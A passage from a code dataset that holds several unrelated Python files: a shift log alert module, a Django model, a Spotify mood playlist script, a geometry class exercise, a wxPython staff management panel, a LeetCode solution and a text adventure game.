get_num_visits_by_date\\n\", result_data)\n return result_data\n\n @staticmethod\n def get_residents_options():\n return input_shiftlogs.input_raw_data['patient_id'].unique().tolist()\n\n @staticmethod\n def get_shiftlog_indicators(patient_id, current_sys_time=None):\n ret_alerts = 
[]\n if not current_sys_time:\n current_sys_time = datetime.datetime.now()\n\n current_sys_date = current_sys_time.date()\n three_weeks_ago = current_sys_date + datetime.timedelta(days=-21)\n one_week_ago = current_sys_date + datetime.timedelta(days=-7)\n four_weeks_ago = current_sys_date + datetime.timedelta(days=-28)\n\n # get data first\n current_data = input_shiftlogs.get_relevant_data(four_weeks_ago, current_sys_date,patient_id)\n # print(current_data)\n # patient_id,datetime,num_falls,num_near_falls,food_consumption,temperature,systolic_bp,diastolic_bp,pulse_pressure,pulse_rate\n # compare averages\n three_week_data = current_data.loc[(current_data['datetime'] < one_week_ago)]\n # print(three_week_data)\n past_week_data = current_data.loc[current_data['datetime'] > one_week_ago]\n # print(past_week_data)\n\n # check averages then check for significant out-of-range numbers\n # check temperatures\n temperature_sd = three_week_data['temperature'].std() # NOTE: maybe can change to some other stdevs\n three_week_average_temp = three_week_data['temperature'].mean()\n past_week_average_temp = past_week_data['temperature'].mean()\n\n if (past_week_average_temp - input_shiftlogs.para_temperature_sd * temperature_sd) > three_week_average_temp:\n ret_alerts.append(\"Significant increase in temperature in the past week\")\n elif (past_week_average_temp + input_shiftlogs.para_temperature_sd * temperature_sd) < three_week_average_temp:\n ret_alerts.append(\"Significant decrease in temperature in the past week\")\n\n if any((past_week_data['temperature'] < input_shiftlogs.para_temperature_min) | (past_week_data['temperature'] > input_shiftlogs.para_temperature_max)):\n ret_alerts.append(\"Abnormal temperatures detected in past week\")\n\n return ret_alerts\n\n# if __name__ == '__main__': # for local testing\n# input_shiftlogs.update_shiftlogs_data()\n# print(\"hi\")\n# # print(input_shiftlogs.get_logs_by_date(datetime.datetime(2018, 10, 1, 0, 0, 0), datetime.datetime.now(), 1))\n# print(input_shiftlogs.get_shiftlog_indicators(1, datetime.datetime(2018, 10, 10, 0, 0, 0)))\n","repo_name":"davidlwr/InternetExplorers","sub_path":"web/apps/input_shiftlogs.py","file_name":"input_shiftlogs.py","file_ext":"py","file_size_in_byte":8869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"71775418470","text":"from __future__ import unicode_literals\n\nfrom django.db import models\n\n# Create your models here.\n\nclass Brand(models.Model):\n brandname = models.CharField(max_length=140, blank=False, null=False)\n\n def __str__(self):\n return self.brandname\n\n class Meta:\n verbose_name = 'Brand'\n verbose_name_plural = 'Brands'\n ordering = ('id', )","repo_name":"devnandito/inventory","sub_path":"brands/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72494011430","text":"import spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\nimport constants\nimport spotipy.util as util\nimport json\nimport os\nfrom os import path\nimport time\nimport random\nfrom similar import similar\nfrom valence import valence\n\ndef valence(trackids, sp):\n\n features = sp.audio_features(trackids) \n\n # swap until features has ascending valence\n for i in range(0, len(features) - 1):\n smallest = [i, features[i]['valence']]\n for j in range(i, len(features)):\n if (features[j]['valence'] < smallest[1] ):\n smallest = [j, 
features[j]['valence']]\n features[i], features[smallest[0]] = features[smallest[0]], features[i]\n\n\n # delete playlists with the same name\n playlist_name = 'VAL'\n playlists = sp.user_playlists(constants.SPOTIFY_USERNAME)['items']\n for x in playlists:\n if x['name'] == playlist_name:\n sp.user_playlist_unfollow(constants.SPOTIFY_USERNAME, x['id'])\n\n # make a playlist and add ascending valence tracks to it\n sp.user_playlist_create(constants.SPOTIFY_USERNAME, name=playlist_name)\n PLAYLIST_ID = sp.user_playlists(constants.SPOTIFY_USERNAME)['items'][0]['id']\n for i in features:\n uri = [i['uri']]\n sp.user_playlist_add_tracks(constants.SPOTIFY_USERNAME, PLAYLIST_ID, uri)\n\n\n print('valence playlist made, waiting for mood...')\n while(True):\n # random songs for each mood\n numSongsSection = int(len(features) / 3 )\n randomInteger = random.randint(0, numSongsSection - 1) \n sadUri = features[randomInteger]['uri']\n neutralUri = features[randomInteger + numSongsSection]['uri']\n happyUri = features[randomInteger + (2 * numSongsSection)]['uri']\n uri = ''\n playSong = False\n type = 'neutral'\n if(path.exists('happy')):\n type = 'happy'\n playSong = True\n os.remove(\"happy\")\n if(path.exists('sad')):\n type='sad'\n playSong = True\n os.remove(\"sad\")\n if(path.exists('neutral')):\n type='neutral'\n playSong = True\n os.remove(\"neutral\")\n if(playSong):\n playSong = False\n devices = sp.devices()\n print(json.dumps(devices, sort_keys=True, indent=4))\n deviceID = devices['devices'][0]['id'] \n if(type=='happy'):\n uri=happyUri\n if(type=='sad'):\n uri=sadUri\n if(type=='neutral'):\n uri=neutralUri\n sp.start_playback(deviceID, None, [uri])\n time.sleep(0.2)","repo_name":"anita-1/emotionator","sub_path":"valence.py","file_name":"valence.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"71461257189","text":"#!/usr/bin/python3\n\"\"\"A class that inherits from the class rectangle to define\n the properties of the square\"\"\"\n\n\nfrom models.rectangle import Rectangle\n\n\nclass Square(Rectangle):\n \"\"\"\n Square is a Class that defines the properties of a square\n based on the class Rectangle\n\n Attributes:\n size (int): the width of the square\n x (int): x coordinates of the square\n y (int): y coordinates of the square\n \"\"\"\n\n def __init__(self, size, x=0, y=0, id=None):\n \"\"\"Init function to create an instance of the Square\n\n Arguments:\n size (int): width of the square\n x (int, optional): x coordinate, defaults to 0\n y (int, optional): y coordinate, defaults to 0\n id (int, optional): the identity of square,\n defaults to None\n \"\"\"\n super().__init__(size, size, x, y, id)\n\n @property\n def size(self):\n \"\"\"A function that retrieves the width property\n\n Returns: (int) the width of the rectangle\n \"\"\"\n return self.width\n\n @size.setter\n def size(self, value):\n \"\"\"A function that sets the width of the rectangle\n\n Arguments:\n value (int): the value of the width to set to\n\n Raises:\n TypeError: raised when width is not an int\n ValueError: raised when width is 0 or negative\n \"\"\"\n if not isinstance(value, int):\n raise TypeError(\"width must be an integer\")\n if value <= 0:\n raise ValueError(\"width must be > 0\")\n self.width = value\n self.height = value\n\n def __str__(self):\n \"\"\"A function that overrides the __str__ method\n and prints the properties of the square\n \"\"\"\n return (\"[Square] ({}) {:d}/{:d} - {:d}\".\n 
format(self.id, self.x, self.y, self.size))\n\n def update(self, *args, **kwargs):\n \"\"\"A function that updates properties with *args\n\n Arguments:\n *args (tuple): the list of non-keyworded argumensts\n **kwargs (dict): a dictionary of keyworded arguments\n \"\"\"\n\n if args is not None and len(args) != 0:\n attribs = ['id', 'size', 'x', 'y']\n for i in range(len(args)):\n if attribs[i] == 'size':\n setattr(self, 'width', args[i])\n setattr(self, 'height', args[i])\n else:\n setattr(self, attribs[i], args[i])\n else:\n for key, value in kwargs.items():\n if key == 'size':\n setattr(self, 'width', value)\n setattr(self, 'height', value)\n else:\n setattr(self, key, value)\n\n def to_dictionary(self):\n \"\"\"A function that creates a dictionary representation\n of the Square\n\n Returns:\n dict (dictionary) : the properties of the Square\n \"\"\"\n dict1 = {}\n dictsqr = self.__dict__\n dict1['id'] = dictsqr['id']\n dict1['size'] = dictsqr['_Rectangle__width']\n dict1['x'] = dictsqr['_Rectangle__x']\n dict1['y'] = dictsqr['_Rectangle__y']\n return (dict1)\n","repo_name":"Benard-Kiplangat/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"13700604991","text":"# -*- coding: utf-8 -*-\n\n## This file is part of Gertrude.\n##\n## Gertrude is free software; you can redistribute it and/or modify\n## it under the terms of the GNU General Public License as published by\n## the Free Software Foundation; either version 3 of the License, or\n## (at your option) any later version.\n##\n## Gertrude is distributed in the hope that it will be useful,\n## but WITHOUT ANY WARRANTY; without even the implied warranty of\n## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n## GNU General Public License for more details.\n##\n## You should have received a copy of the GNU General Public License\n## along with Gertrude; if not, see .\n\nimport os, datetime, time, xml.dom.minidom, cStringIO\nimport wx, wx.lib.scrolledpanel, wx.html\nfrom constants import *\nfrom sqlobjects import *\nfrom controls import *\nfrom planning import *\nfrom cotisation import *\nfrom ooffice import *\n \nwildcard = \"PNG (*.png)|*.png|\" \\\n \"BMP (*.pmp)|*.bmp|\" \\\n \"All files (*.*)|*.*\"\n\nclass SalariesTab(AutoTab):\n def __init__(self, parent):\n AutoTab.__init__(self, parent)\n self.salarie = None\n\n def SetSalarie(self, salarie):\n self.salarie = salarie\n for ctrl in self.ctrls:\n ctrl.SetInstance(salarie)\n\nclass IdentiteSalariePanel(SalariesTab):\n def __init__(self, parent):\n SalariesTab.__init__(self, parent)\n self.salarie = None\n self.delbmp = wx.Bitmap(GetBitmapFile(\"remove.png\"), wx.BITMAP_TYPE_PNG)\n self.sizer = wx.BoxSizer(wx.VERTICAL)\n sizer2 = wx.FlexGridSizer(0, 2, 5, 10)\n self.sizer2 = sizer2\n sizer2.AddGrowableCol(1, 1)\n prenom_ctrl = AutoTextCtrl(self, None, 'prenom')\n self.Bind(wx.EVT_TEXT, self.EvtChangementPrenomNom, prenom_ctrl)\n nom_ctrl = AutoTextCtrl(self, None, 'nom')\n self.Bind(wx.EVT_TEXT, self.EvtChangementPrenomNom, nom_ctrl)\n sizer2.AddMany([(wx.StaticText(self, -1, u'Prénom :'), 0, wx.ALIGN_CENTER_VERTICAL), (prenom_ctrl, 0, wx.EXPAND)])\n sizer2.AddMany([(wx.StaticText(self, -1, 'Nom :'), 0, wx.ALIGN_CENTER_VERTICAL), (nom_ctrl, 0, wx.EXPAND)])\n for label, field in (u\"Téléphone domicile\", \"telephone_domicile\"), (u\"Téléphone portable\", \"telephone_portable\"):\n sizer3 = wx.BoxSizer(wx.HORIZONTAL)\n sizer3.AddMany([(AutoPhoneCtrl(self, None, field), 0), (AutoTextCtrl(self, None, field+'_notes'), 1, wx.LEFT|wx.EXPAND, 5)])\n sizer2.AddMany([(wx.StaticText(self, -1, label+' :'), 0, wx.ALIGN_CENTER_VERTICAL), (sizer3, 0, wx.EXPAND)])\n sizer2.AddMany([(wx.StaticText(self, -1, 'E-mail :'), 0, wx.ALIGN_CENTER_VERTICAL), (AutoTextCtrl(self, None, 'email'), 0, wx.EXPAND)])\n sizer2.AddMany([(wx.StaticText(self, -1, u\"Diplômes :\"), 0, wx.ALIGN_CENTER_VERTICAL), (AutoComboBox(self, None, 'diplomes', choices=[\"CAP petite enfance\", u\"Auxiliaire puéricultrice\", \"EJE\", u\"Puéricultrice\", \"Sans objet\"]), 0, wx.EXPAND)])\n self.sizer.Add(sizer2, 0, wx.EXPAND|wx.ALL, 5)\n self.SetSizer(self.sizer)\n self.sizer.FitInside(self)\n \n def EvtChangementPrenomNom(self, event):\n event.GetEventObject().onText(event)\n self.parent.EvtChangementPrenomNom(event)\n\n def EvtChangementDateNaissance(self, event):\n date_naissance = self.date_naissance_ctrl.GetValue()\n self.age_ctrl.SetValue(GetAgeString(date_naissance))\n\n def EvtChangementCodePostal(self, event):\n code_postal = self.code_postal_ctrl.GetValue()\n if code_postal and not self.ville_ctrl.GetValue():\n for salarie in creche.salaries:\n if salarie.code_postal == code_postal and salarie.ville:\n self.ville_ctrl.SetValue(salarie.ville)\n break\n \n def UpdateContents(self):\n AutoTab.UpdateContents(self)\n self.sizer.FitInside(self)\n \n def SetSalarie(self, salarie):\n self.salarie = salarie\n self.UpdateContents()\n SalariesTab.SetSalarie(self, salarie)\n\nclass CongesPanel(SalariesTab):\n def __init__(self, parent):\n global delbmp\n delbmp = wx.Bitmap(GetBitmapFile(\"remove.png\"), wx.BITMAP_TYPE_PNG)\n self.last_creche_observer = -1\n \n SalariesTab.__init__(self, parent)\n self.sizer = wx.BoxSizer(wx.VERTICAL)\n \n self.conges_creche_sizer = 
wx.BoxSizer(wx.VERTICAL)\n self.affiche_conges_creche()\n self.sizer.Add(self.conges_creche_sizer, 0, wx.ALL, 5)\n \n self.conges_salarie_sizer = wx.BoxSizer(wx.VERTICAL)\n self.sizer.Add(self.conges_salarie_sizer, 0, wx.ALL, 5)\n \n self.nouveau_conge_button = wx.Button(self, -1, u'Nouvelle période de congés')\n self.sizer.Add(self.nouveau_conge_button, 0, wx.EXPAND+wx.TOP, 5)\n self.Bind(wx.EVT_BUTTON, self.evt_conge_add, self.nouveau_conge_button)\n\n# sizer2 = wx.BoxSizer(wx.HORIZONTAL)\n# sizer2.AddMany([(wx.StaticText(self, -1, u'Nombre de semaines de congés déduites :'), 0, wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 10), (AutoNumericCtrl(self, creche, 'semaines_conges', min=0, precision=0), 0, wx.EXPAND)])\n# self.sizer.Add(sizer2, 0, wx.EXPAND+wx.TOP, 5)\n\n self.SetSizer(self.sizer)\n\n def UpdateContents(self):\n if 'conges' in observers and observers['conges'] > self.last_creche_observer:\n self.affiche_conges_creche()\n if self.salarie:\n for i in range(len(self.conges_salarie_sizer.GetChildren()), len(self.salarie.conges)):\n self.AddLine(i)\n for i in range(len(self.salarie.conges), len(self.conges_salarie_sizer.GetChildren())):\n self.RemoveLine()\n else:\n for i in range(len(self.conges_salarie_sizer.GetChildren())):\n self.RemoveLine()\n self.sizer.Layout()\n AutoTab.UpdateContents(self)\n \n def SetSalarie(self, salarie):\n self.salarie = salarie\n self.UpdateContents()\n SalariesTab.SetSalarie(self, salarie)\n self.nouveau_conge_button.Enable(self.salarie is not None and not readonly)\n\n def affiche_conges_creche(self):\n self.conges_creche_sizer.DeleteWindows()\n labels_conges = [j[0] for j in jours_fermeture]\n for text in labels_conges:\n checkbox = wx.CheckBox(self, -1, text)\n checkbox.Disable()\n if text in creche.feries:\n checkbox.SetValue(True)\n self.conges_creche_sizer.Add(checkbox, 0, wx.EXPAND)\n for conge in creche.conges:\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n sizer.AddMany([(wx.StaticText(self, -1, 'Debut :'), 0, wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 10), AutoDateCtrl(self, conge, 'debut', mois=True, fixed_instance=True)])\n sizer.AddMany([(wx.StaticText(self, -1, 'Fin :'), 0, wx.LEFT|wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 10), AutoDateCtrl(self, conge, 'fin', mois=True, fixed_instance=True)])\n sizer.AddMany([(wx.StaticText(self, -1, u'Libellé :'), 0, wx.LEFT|wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 10), AutoTextCtrl(self, conge, 'label', fixed_instance=True)])\n for child in sizer.GetChildren():\n child.GetWindow().Disable()\n self.conges_creche_sizer.Add(sizer)\n self.last_creche_observer = time.time()\n\n def AddLine(self, index):\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n sizer.AddMany([(wx.StaticText(self, -1, 'Debut :'), 0, wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 10), AutoDateCtrl(self, self.salarie, 'conges[%d].debut' % index, mois=True)])\n sizer.AddMany([(wx.StaticText(self, -1, 'Fin :'), 0, wx.LEFT|wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 10), AutoDateCtrl(self, self.salarie, 'conges[%d].fin' % index, mois=True)])\n sizer.AddMany([(wx.StaticText(self, -1, u'Libellé :'), 0, wx.LEFT|wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 10), AutoTextCtrl(self, self.salarie, 'conges[%d].label' % index)])\n delbutton = wx.BitmapButton(self, -1, delbmp)\n delbutton.index = index\n sizer.Add(delbutton, 0, wx.LEFT|wx.ALIGN_CENTER_VERTICAL, 10)\n self.Bind(wx.EVT_BUTTON, self.evt_conge_del, delbutton)\n self.conges_salarie_sizer.Add(sizer)\n \n def RemoveLine(self):\n index = len(self.conges_salarie_sizer.GetChildren()) - 1\n sizer = self.conges_salarie_sizer.GetItem(index)\n sizer.DeleteWindows()\n 
self.conges_salarie_sizer.Detach(index)\n\n def evt_conge_add(self, event):\n history.Append(Delete(self.salarie.conges, -1))\n self.salarie.AddConge(CongeSalarie(self.salarie))\n self.AddLine(len(self.salarie.conges) - 1)\n self.sizer.Layout()\n\n def evt_conge_del(self, event):\n index = event.GetEventObject().index\n history.Append(Insert(self.salarie.conges, index, self.salarie.conges[index]))\n self.RemoveLine()\n conge = self.salarie.conges[index]\n del self.salarie.conges[index]\n conge.delete()\n self.sizer.Layout()\n self.UpdateContents()\n\nclass PlanningReferenceSalariePanel(PlanningWidget):\n def __init__(self, parent, activity_choice):\n PlanningWidget.__init__(self, parent, activity_choice, options=NO_ICONS|PRESENCES_ONLY)\n \n def UpdateContents(self):\n lines = []\n if self.contrat:\n for day in range(self.contrat.duree_reference):\n if JourSemaineAffichable(day):\n line = self.contrat.reference[day]\n line.insert = None\n line.label = days[day % 7]\n line.reference = None\n line.summary = True\n lines.append(line)\n self.SetLines(lines)\n\n def SetContrat(self, contrat):\n self.contrat = contrat\n self.UpdateContents()\n \nclass ContratsSalariePanel(SalariesTab, PeriodeMixin):\n def __init__(self, parent):\n SalariesTab.__init__(self, parent)\n PeriodeMixin.__init__(self, 'contrats')\n sizer = wx.BoxSizer(wx.VERTICAL)\n ligne_sizer = wx.BoxSizer(wx.HORIZONTAL)\n ligne_sizer.Add(PeriodeChoice(self, self.nouveauContrat))\n sizer.Add(ligne_sizer, 0, wx.TOP, 5)\n sizer1 = wx.FlexGridSizer(0, 2, 5, 10)\n sizer1.AddGrowableCol(1, 1)\n \n self.sites_items = wx.StaticText(self, -1, u\"Site :\"), AutoChoiceCtrl(self, None, 'site'), wx.StaticText(self, -1, u\"Sites de préinscription :\"), wx.CheckListBox(self, -1)\n self.UpdateSiteItems()\n sizer1.AddMany([(self.sites_items[0], 0, wx.ALIGN_CENTER_VERTICAL), (self.sites_items[1], 0, wx.EXPAND)])\n sizer1.AddMany([(self.sites_items[2], 0, wx.ALIGN_CENTER_VERTICAL), (self.sites_items[3], 0, wx.EXPAND)])\n \n sizer1.AddMany([(wx.StaticText(self, -1, u\"Fonction :\"), 0, wx.ALIGN_CENTER_VERTICAL), (AutoTextCtrl(self, None, 'fonction'), 0, wx.EXPAND)])\n \n self.duree_reference_choice = wx.Choice(self)\n for item, data in [(\"1 semaine\", 7)] + [(\"%d semaines\" % (i+2), 7*(i+2)) for i in range(MAX_SEMAINES_REFERENCE-1)]:\n self.duree_reference_choice.Append(item, data)\n self.Bind(wx.EVT_CHOICE, self.onDureeReferenceChoice, self.duree_reference_choice)\n sizer1.AddMany([(wx.StaticText(self, -1, u\"Durée de la période de référence :\"), 0, wx.ALIGN_CENTER_VERTICAL), (self.duree_reference_choice, 0, wx.EXPAND)])\n sizer.Add(sizer1, 0, wx.ALL|wx.EXPAND, 5)\n \n sizer2 = wx.BoxSizer(wx.HORIZONTAL)\n self.button_copy = wx.Button(self, -1, u\"Recopier lundi sur toute la période\")\n sizer2.Add(self.button_copy)\n self.Bind(wx.EVT_BUTTON, self.onMondayCopy, self.button_copy)\n \n self.activity_choice = ActivityComboBox(self) \n sizer2.Add(self.activity_choice, 0, wx.ALIGN_RIGHT)\n sizer.Add(sizer2, 0, wx.EXPAND)\n \n self.planning_panel = PlanningReferenceSalariePanel(self, self.activity_choice)\n sizer.Add(self.planning_panel, 1, wx.EXPAND)\n self.SetSizer(sizer)\n self.UpdateContents()\n \n def nouveauContrat(self, param): # TODO les autres pareil ...\n contrat = Contrat(self.salarie)\n return contrat\n\n def SetSalarie(self, salarie):\n self.salarie = salarie\n self.SetInstance(salarie)\n self.UpdateContents()\n \n def onDureeReferenceChoice(self, event):\n history.Append(None)\n duration = 
self.duree_reference_choice.GetClientData(self.duree_reference_choice.GetSelection())\n self.salarie.contrats[self.periode].SetReferenceDuration(duration)\n self.UpdateContents()\n \n def onMode_5_5(self, event):\n history.Append(None)\n contrat = self.salarie.contrats[self.periode]\n contrat.mode = MODE_5_5\n for i, day in enumerate(contrat.reference):\n if JourSemaineAffichable(i):\n day.SetState(0)\n self.UpdateContents()\n \n def onMondayCopy(self, event):\n history.Append(None)\n contrat = self.salarie.contrats[self.periode]\n for i, day in enumerate(contrat.reference):\n if i > 0 and JourSemaineAffichable(i):\n day.Copy(contrat.reference[0], False)\n day.Save()\n self.UpdateContents()\n \n def UpdateSiteItems(self):\n if len(creche.sites) > 1:\n items = [(site.nom, site) for site in creche.sites]\n self.sites_items[1].SetItems(items)\n for nom, site in items:\n self.sites_items[3].Append(nom)\n else:\n for item in self.sites_items:\n item.Show(False)\n self.last_site_observer = time.time()\n\n def UpdateContents(self):\n if 'sites' in observers and observers['sites'] > self.last_site_observer:\n self.UpdateSiteItems()\n\n SalariesTab.UpdateContents(self)\n\n self.InternalUpdate()\n \n self.activity_choice.Clear()\n selected = 0\n if creche.HasActivitesAvecHoraires():\n self.activity_choice.Show(True)\n for i, activity in enumerate(creche.activites.values()):\n self.activity_choice.Append(activity.label, activity)\n try:\n if self.activity_choice.activity.value == activity.value:\n selected = i\n except:\n pass\n else:\n self.activity_choice.Show(False)\n self.activity_choice.Append(creche.activites[0].label, creche.activites[0])\n self.activity_choice.SetSelection(selected)\n \n self.Layout()\n\n def SetPeriode(self, periode):\n PeriodeMixin.SetPeriode(self, periode)\n self.InternalUpdate()\n \n def InternalUpdate(self):\n if self.salarie and self.periode is not None and self.periode != -1 and self.periode < len(self.salarie.contrats):\n contrat = self.salarie.contrats[self.periode]\n for obj in [self.duree_reference_choice, self.button_copy]:\n obj.Enable(not readonly)\n if len(creche.sites) > 1:\n for item in self.sites_items[0:2]:\n item.Show(True)\n for item in self.sites_items[2:4]:\n item.Show(False)\n \n self.duree_reference_choice.SetSelection(contrat.duree_reference / 7 - 1)\n self.planning_panel.SetContrat(contrat)\n else:\n self.planning_panel.SetContrat(None)\n for obj in [self.duree_reference_choice, self.button_copy]:\n obj.Disable()\n\n \nclass SalariesNotebook(wx.Notebook):\n def __init__(self, parent, *args, **kwargs):\n wx.Notebook.__init__(self, parent, style=wx.LB_DEFAULT, *args, **kwargs) \n self.parent = parent\n self.salarie = None\n\n self.AddPage(IdentiteSalariePanel(self), u'Identité')\n self.AddPage(CongesPanel(self), u\"Congés\")\n self.AddPage(ContratsSalariePanel(self), u\"Plannings de référence\")\n\n self.Bind(wx.EVT_NOTEBOOK_PAGE_CHANGED, self.onPageChanged) \n \n def EvtChangementPrenomNom(self, event):\n self.parent.ChangePrenomNom(self.salarie)\n\n def onPageChanged(self, event):\n self.GetPage(event.GetSelection()).UpdateContents()\n event.Skip()\n\n def SetSalarie(self, salarie):\n self.salarie = salarie\n for i in range(self.GetPageCount()):\n page = self.GetPage(i)\n page.SetSalarie(salarie)\n \n def UpdateContents(self):\n self.GetCurrentPage().UpdateContents()\n \nclass SalariesPanel(GPanel):\n name = u\"Salariés\"\n bitmap = GetBitmapFile(\"salaries.png\")\n profil = PROFIL_ALL\n def __init__(self, parent):\n GPanel.__init__(self, parent, 
u\"Salariés\")\n\n # Le control pour la selection du bebe\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n self.choice = wx.Choice(self)\n self.Bind(wx.EVT_CHOICE, self.EvtSalarieChoice, self.choice)\n plusbmp = wx.Bitmap(GetBitmapFile(\"plus.png\"), wx.BITMAP_TYPE_PNG)\n delbmp = wx.Bitmap(GetBitmapFile(\"remove.png\"), wx.BITMAP_TYPE_PNG)\n self.addbutton = wx.BitmapButton(self, -1, plusbmp)\n self.delbutton = wx.BitmapButton(self, -1, delbmp)\n self.addbutton.SetToolTipString(u\"Ajouter un salarié\")\n self.delbutton.SetToolTipString(u\"Retirer ce salarié\")\n self.Bind(wx.EVT_BUTTON, self.EvtSalarieAddButton, self.addbutton)\n self.Bind(wx.EVT_BUTTON, self.EvtSalarieDelButton, self.delbutton)\n sizer.AddMany([(self.choice, 1, wx.EXPAND|wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 5), (self.addbutton, 0, wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 5), (self.delbutton, 0, wx.ALIGN_CENTER_VERTICAL)])\n self.sizer.Add(sizer, 0, wx.EXPAND|wx.LEFT, MACOS_MARGIN)\n # le notebook pour la fiche d'contrat\n self.notebook = SalariesNotebook(self)\n self.sizer.Add(self.notebook, 1, wx.EXPAND|wx.TOP, 5)\n self.InitSalaries()\n\n def UpdateContents(self):\n self.notebook.UpdateContents()\n\n def InitSalaries(self, selected=None):\n self.choice.Clear()\n\n salaries = { }\n autres = { }\n for salarie in creche.salaries:\n if salarie.GetContrat(datetime.date.today()) != None:\n salaries[GetPrenomNom(salarie)] = salarie\n else:\n autres[GetPrenomNom(salarie)] = salarie\n \n keys = salaries.keys()\n keys.sort()\n for key in keys:\n self.choice.Append(key, salaries[key])\n \n if len(salaries) > 0 and len(autres) > 0:\n self.choice.Append(150 * '-', None)\n \n keys = autres.keys()\n keys.sort()\n for key in keys:\n self.choice.Append(key, autres[key])\n\n if len(creche.salaries) > 0 and selected != None and selected in creche.salaries:\n self.SelectSalarie(selected)\n elif len(creche.salaries) > 0:\n self.SelectSalarie(self.choice.GetClientData(0))\n else:\n self.SelectSalarie(None)\n\n def EvtSalarieChoice(self, evt):\n ctrl = evt.GetEventObject()\n selected = ctrl.GetSelection()\n salarie = ctrl.GetClientData(selected)\n if salarie:\n self.delbutton.Enable()\n self.notebook.SetSalarie(salarie)\n else:\n ctrl.SetSelection(0)\n self.EvtSalarieChoice(evt)\n\n def SelectSalarie(self, salarie):\n if salarie:\n for i in range(self.choice.GetCount()):\n if self.choice.GetClientData(i) == salarie:\n self.choice.SetSelection(i)\n break\n else:\n self.choice.SetSelection(-1)\n self.notebook.SetSalarie(salarie)\n\n def EvtSalarieAddButton(self, evt):\n history.Append(Delete(creche.salaries, -1))\n salarie = Salarie()\n self.choice.Insert(u'Nouveau salarié', 0, salarie)\n self.choice.SetSelection(0)\n creche.salaries.append(salarie)\n self.notebook.SetSalarie(salarie)\n self.notebook.SetSelection(0) # Selectionne la page identite\n\n def EvtSalarieDelButton(self, evt):\n selected = self.choice.GetSelection()\n salarie = self.choice.GetClientData(selected)\n if salarie:\n dlg = wx.MessageDialog(self,\n u'Les données de ce salarié vont être supprimées, êtes-vous sûr de vouloir continuer ?',\n 'Confirmation',\n wx.YES_NO | wx.NO_DEFAULT | wx.ICON_EXCLAMATION )\n if dlg.ShowModal() == wx.ID_YES:\n index = creche.salaries.index(salarie)\n history.Append(Insert(creche.salaries, index, salarie))\n salarie.delete()\n del creche.salaries[index]\n self.choice.Delete(selected)\n self.choice.SetSelection(-1)\n self.notebook.SetSalarie(None)\n self.delbutton.Disable()\n dlg.Destroy()\n \n def ChangePrenomNom(self, salarie):\n if creche and salarie:\n id = 
GetPrenomNom(salarie)\n if id.isspace():\n id = u'Nouveau salarié'\n selection = self.choice.GetSelection()\n self.choice.SetString(selection, id)\n self.choice.SetSelection(selection)\n ","repo_name":"mistraloz/gertrude","sub_path":"panel_salaries.py","file_name":"panel_salaries.py","file_ext":"py","file_size_in_byte":21573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"} +{"seq_id":"31623149538","text":"# @Time : 2022-08-11 21:43\n# @Author : Phalange\n# @File : 1281. 整数的各位积和之差.py\n# @Software: PyCharm\n# C'est la vie,enjoy it! :D\n\n\n\n\nclass Solution:\n def subtractProductAndSum(self, n: int) -> int:\n nums = [int(each) for each in str(n)]\n ans1 = sum(nums)\n ans2 = 1\n for each in nums:\n ans2 *=each\n return ans2 - ans1\n\nprint(Solution().subtractProductAndSum(\"123\"))","repo_name":"enternityFan/LeetCodePythonVersion","sub_path":"数学/1281. 整数的各位积和之差.py","file_name":"1281. 整数的各位积和之差.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"16642857136","text":"import time\n\ndef introduction():\n print(\"Welcome to the Text Adventure Game!\")\n time.sleep(1)\n print(\"You are standing in front of a mysterious cave.\")\n time.sleep(1)\n print(\"Your mission is to explore the cave and find the hidden treasure.\")\n time.sleep(1)\n print(\"Be cautious, as danger may lurk in the darkness...\")\n time.sleep(1)\n\ndef cave():\n print(\"\\nYou enter the cave.\")\n time.sleep(1)\n print(\"It's dark and damp, and you can hear strange noises echoing.\")\n time.sleep(1)\n\n while True:\n choice = input(\"Do you want to go 'left' or 'right'? \").lower()\n if choice == \"left\":\n treasure_chamber()\n break\n elif choice == \"right\":\n print(\"You stumble upon a group of bats. They startle you and you run back.\")\n else:\n print(\"Invalid choice. Please choose 'left' or 'right'.\")\n\ndef treasure_chamber():\n print(\"\\nYou find yourself in a mysterious treasure chamber.\")\n time.sleep(1)\n print(\"There are three chests in front of you.\")\n time.sleep(1)\n\n while True:\n choice = input(\"Which chest do you want to open? '1', '2', or '3'? \")\n if choice == \"1\":\n print(\"Oh no! A trap! A giant boulder rolls towards you.\")\n time.sleep(1)\n print(\"You couldn't escape in time. Game over!\")\n break\n elif choice == \"2\":\n print(\"Congratulations! You found the treasure! You win!\")\n break\n elif choice == \"3\":\n print(\"A swarm of angry bees fly out and chase you away.\")\n else:\n print(\"Invalid choice. Please choose '1', '2', or '3'.\")\n\nif __name__ == \"__main__\":\n introduction()\n cave()\n","repo_name":"phototix/GH-hacks","sub_path":"python/test4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} 